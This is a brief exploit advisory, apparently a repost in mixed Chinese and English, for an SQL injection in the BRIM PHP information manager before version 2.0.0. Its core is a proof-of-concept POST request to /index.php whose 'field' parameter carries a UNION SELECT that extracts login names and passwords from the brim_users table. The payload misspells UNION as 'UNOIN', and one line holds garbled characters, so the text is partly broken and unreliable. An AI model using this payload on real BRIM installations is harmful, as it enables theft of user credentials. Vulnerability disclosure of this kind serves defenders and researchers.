BRIM < 2.0.0 SQL注射信息
标题: BRIM < 2.0.0 SQL Injection
作者: ifnull www.2cto.com
测试平台: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45 �尽管它可以在任何环境下运行.
 Example uses MySQL 5 query escape but can easily be ported to prior versions of MySQL.
描述: Unlike CVE-2008-4082, this will work with or without
   magic_quotes_gpc enabled. Like the last exploit however, you must first
   create an account and enable "tasks". By default anyone can create an
   account and the accounts are automatically approved.
程序信息
版本: < 2.0.0
地址: http://sourceforge.net/projects/brim/
描述:
 
BRIM is a MVC framework, written in PHP and based on
   items with a hierarchical relationship. The list of plugins make BRIM a
   Information Manager with plugins like bookmarks, a calendar, contacts
   tasks, notes, RSS etc. www.2cto.com The application is multilingual.
Proof of ConceptPOST
URI: /index.php
Data: plugin=tasks&field=1%3D1%20UNOIN%20SELECT%201%2C2%2C3%2C4%2CCONCAT(loginname%2C0x3a%2Cpassword)%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%20from%20brim_users--&value=asdf&action=searchTasks